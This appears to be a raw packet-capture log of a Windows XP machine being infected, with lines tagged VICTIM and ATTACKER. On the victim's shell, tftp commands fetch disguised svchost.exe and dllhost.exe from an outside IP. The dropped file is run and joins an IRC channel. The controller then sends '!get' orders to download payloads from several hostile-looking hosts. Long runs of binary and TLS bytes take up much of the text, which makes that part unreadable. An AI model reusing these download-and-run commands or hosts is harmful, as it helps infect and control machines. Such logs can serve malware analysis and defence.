VICTIM: Microsoft Windows XP [Version 5.1.2600]
VICTIM: (C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\winsFile Not FoundC:\\WINDOWS\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is 3CF1-1DE8 Directory of C:\\WINDOWS\\system32\\dllcacheFile Not FoundC:\\WINDOWS\\system32>
VICTIM: tftp -i 39.116.72.4 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: Transfer successful: 29184 bytes in 9 seconds, 3242 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 39.116.72.4 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: Transfer successful: 19968 bytes in 7 seconds, 2852 bytes/s
VICTIM: C:\\WINDOWS\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: NICK bucbjwvuUSER h020501 . . :-
VICTIM: JOIN &virtu
ATTACKER: :u. PRIVMSG bucbjwvu :!get http:/soulandmore.com/components/com_ag_google_analytics2/dir/index.php:u. PRIVMSG bucbjwvu :!get http:/joposdv.pl:9/pl.txt:u. PRIVMSG bucbjwvu :!get http:/hardertodetect.ru/kd289sdf.txt:u. PRIVMSG bucbjwvu :!get http:/141.136.27.220/clubg.exe
VICTIM: GET /components/com_ag_google_analytics2/dir/index.php HTTP/1.0User-Agent: DownloadHost: soulandmore.comPragma: no-cache
ATTACKER: GET /pl.txt HTTP/1.0User-Agent: DownloadHost: joposdv.pl:9Pragma: no-cache
ATTACKER: GET /jiba.asp HTTP/1.0User-Agent: CA 0.0.0.2Host: joposdv.pl:9
ATTACKER: GET /aack.txt HTTP/1.0User-Agent: CA 0.0.0.2Host: joposdv.pl:9Cookie: ASPSESSIONIDQSBDSCRB=OLKBHBBCPJLBKMBHJJJICDNF
ATTACKER: GET /kd289sdf.txt HTTP/1.0User-Agent: DownloadHost: hardertodetect.ruPragma: no-cache
ATTACKER: GET /ck.txt HTTP/1.0User-Agent: CA 0.0.0.2Host: joposdv.pl:9Cookie: ASPSESSIONIDQSBDSCRB=OLKBHBBCPJLBKMBHJJJICDNF
ATTACKER: GET /park/check.asp HTTP/1.0User-Agent: CA 0.0.0.2Host: ga.9kusddaily.com:88
ATTACKER: GET /waplyj.txt HTTP/1.0User-Agent: CA 0.0.0.2Host: joposdv.pl:9Cookie: ASPSESSIONIDQSBDSCRB=OLKBHBBCPJLBKMBHJJJICDNF
ATTACKER: GET /alitr3.txt HTTP/1.0User-Agent: CA 0.0.0.2Host: joposdv.pl:9Cookie: ASPSESSIONIDQSBDSCRB=OLKBHBBCPJLBKMBHJJJICDNF
VICTIM: \200L\001\003\000\0003\000\000\000\020\000\000\004\000\000\005\000\000\001\000\200\007\000\300\003\000\200\000\000\t\006\000@\000\000d\000\000b\000\000\003\000\000\006\002\000\200\004\000\200\000\000\023\000\000\022\000\000c\226,\207\205\263\250\371\321\202\201\306\020D(\000'
VICTIM: \026\003\000\001\004\020\000\001\000r\016a\225/\023/\026\352M\337\357\022\301\031*\320\241\241\010\2753\306\304\310\321\262\264\230\312\246D+\316e\240\337y\342,AT\033\301\342\300Axd\365d\263\266h\331,\306\023\276Eq\021{\277F\330\260xd\353\\246\337\341m\241>~\244o\210\303\246\376\203\211\245\275\365t7\036y\212\177\342+}j\026\316\251\345y\224\013\321]\361\370\217y\247G\353\247Cm\031\254\271\277\315\265\336*\251*\375\177=@\243\361e|\273m\$3\237\370;\213\260T\204\351\221Iw\222\213\301\260E\240\333\272d\364S\302\266\304\026\214\246\227\207\315\016\323&\221IfX|~d}\022\3045\252P'Q\334N=\263\327[Jy\201\023gN|\251\035\230\366\377\2456x\364\326\223\347R\352\250x\356\017\313\255\216\273\355\007\311\255\204\331\343\004\003\031\030e\227Sd\177\301J\330\346p%\317.\005\300\355\005\203'\024\003\000\000\001\001\026\003\000\0008\036\366\\330\244H\tVL\251\024!\334\326\302\235H\\232t\377.\315\263\027\354N\307Xf79@\303\t\335\032\235?U\177\023\016\242f\033\206u\325s\\\306\343;g
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
VICTIM: \200L\001\003\000\0003\000\000\000\020\000\000\004\000\000\005\000\000\001\000\200\007\000\300\003\000\200\000\000\t\006\000@\000\000d\000\000b\000\000\003\000\000\006\002\000\200\004\000\200\000\000\023\000\000\022\000\000c\370%V\377\037I\362\207\244\300\333\203\246\241\363\024
ATTACKER: GET /afei.txt HTTP/1.0User-Agent: CA 0.0.0.2Host: joposdv.pl:9Cookie: ASPSESSIONIDQSBDSCRB=OLKBHBBCPJLBKMBHJJJICDNF
VICTIM: \026\003\000\000\204\020\000\000\200\244tV\035\314\270\304:\235`/\037\213P\324\305\020\255(\376\2179\346^\350%\312\236\256\017\273\361\260\333\006\036\004\200n\306\034\226n7\367\270'\313\224\237\201V\026\366\344=D\304\225O)\212\357\037\332&\255\352s\253\236x\035\204;)\270H)\026\247\211\256\214\272S\354\243S%iM\222\262\347\177q|W\314\267\314w\207\341\020\2319-\232\206\022\250\240\340(\233\257\363\tAR\275*YM\307\024\003\000\000\001\001\026\003\000\0008<\217Ep\004\325\231=*P&\341x\016\33661\202\241\330h=u\342\037\200p>\260@\204\364b?M\231I\207N\364\276u\342\251\216\234Z\272b\231R\277qW[\342
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
VICTIM: \200L\001\003\000\0003\000\000\000\020\000\000\004\000\000\005\000\000\001\000\200\007\000\300\003\000\200\000\000\t\006\000@\000\000d\000\000b\000\000\003\000\000\006\002\000\200\004\000\200\000\000\023\000\000\022\000\000c\331M\325?\235a\304\016!%\301N\205}\345\272
VICTIM: \026\003\000\000\204\020\000\000\200m\332]\311\027\002\322\310\210R61oi1Tv>*\200\377G\322\353\245h\247y\$g\213\$\007\001\252\250fs\276\372\005+\306\206\304\361=p\315\270 \337\320M\320\240\240]|\212\252\266\253\323\247\261\236\206U\006gD\236\204\341\234\220\003\303\217\223P2\230#Tt\202/\371D\203\030{\354+%\\\263\323\375e!\254[\256\225\271^\235\213-y\270\230\362\255\220\245\301\272Sn\034\304\232H\024\003\000\000\001\001\026\003\000\0008s\3068\306\241,g9\255\324!\241\037V~j\350C\365\342\003\203\376L\360\266Z\$\3013\312\274\267S\003\311\246\342\233\343J\352\302IN\233\211sJWI\261X9K\330
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
VICTIM: \026\003\000\000A\001\000\000=\003\000G\206T0\320\225J\257\337\177|[f\332\240\325&\353e\014K\273H\032?_&\010\315\233\357\212\000\000\026\000\004\000\005\000\000\t\000d\000b\000\003\000\006\000\023\000\022\000c\001\000
VICTIM: \026\003\000\000\204\020\000\000\200\255\007\272\004\000pIys\001o\221\024O\343\357|\231\001\277\216\311]bV\t<\365\367\026\366\231\334c\263K\203\232\372\2421e\243\327/UL\253H\303\226\250\340\300xe\230\232\036\017s\274\016\\014\270Q\247\315jK|\027\366\j\246\024\307\212Eu\335L+\007\362JB\306\325]C3N\010\366\362(\215'\010F\304\2526h\016\356\270g\014\332me\326\325[6\276?\216\330uT\024\003\000\000\001\001\026\003\000\0008{\347|\365\315c\204\t>\306\260qF\346[\252\351<\2539\323#:\362J\201]\322\341\001\351\231\220!\014K\276^\350Q\361e\331\247\303\376,+\243\354\332(\3360\O
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
ATTACKER: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.0Accept: */*User-Agent: CryptRetrieveObjectByUrl::InetSchemeProviderHost: www.download.windowsupdate.comConnection: Keep-AlivePragma: no-cache
VICTIM: \200L\001\003\000\0003\000\000\000\020\000\000\004\000\000\005\000\000\001\000\200\007\000\300\003\000\200\000\000\t\006\000@\000\000d\000\000b\000\000\003\000\000\006\002\000\200\004\000\200\000\000\023\000\000\022\000\000c\327\276V\241\026\223\212\246v\241\020\266\001D\210
VICTIM: \026\003\000\001\004\020\000\001\000z\353%\346s\206?\271\255\364\235\323O n\311\254\341\016*\353\343\035\234\351\275\221V\%\272\346\035\251X\321\321_\027)\315\354X\220\242g\371\010\005rJ9\3359\351\311s\251_\261hz@\026\t@EV\203\350\303\274P5\030\233\213w\202%g\306<\326@\003f\0308\030\010\217\356[\222\2600.\036\236)\302\226\331J_%w\274\244\266*J9~\013,\303\370#;RM\026a=\303\022TJ\205\312 \246\3515\337\017\025\\z\211\271\206\035\034\357\366\201\2713\010\231C&\020?\364'k\257\177\266V5\335\233\351\227\004\206\202\232iM\265\255I\037\273\217<\365F\201\003\231Y\324b`\261q\364\262\300\356p\325\306\342\037q}\200O\353{\362\\307\202\0250\352A;=q\\032\313&\236jg\017\252\314\235\220\325\301&\372\236\207\252\351D2!\$\366\037\306#\352wcD\2567\241\024\024\003\000\000\001\001\026\003\000\0008\236\307z1x\341\244\276_s\277L\364\202\311\231\014\222\256\3276#v\204\225\t\340l\276\317\t\201\3772\035\325\006bs1\337\302\014\336J\306\256.i\240\233\306\222T\373\021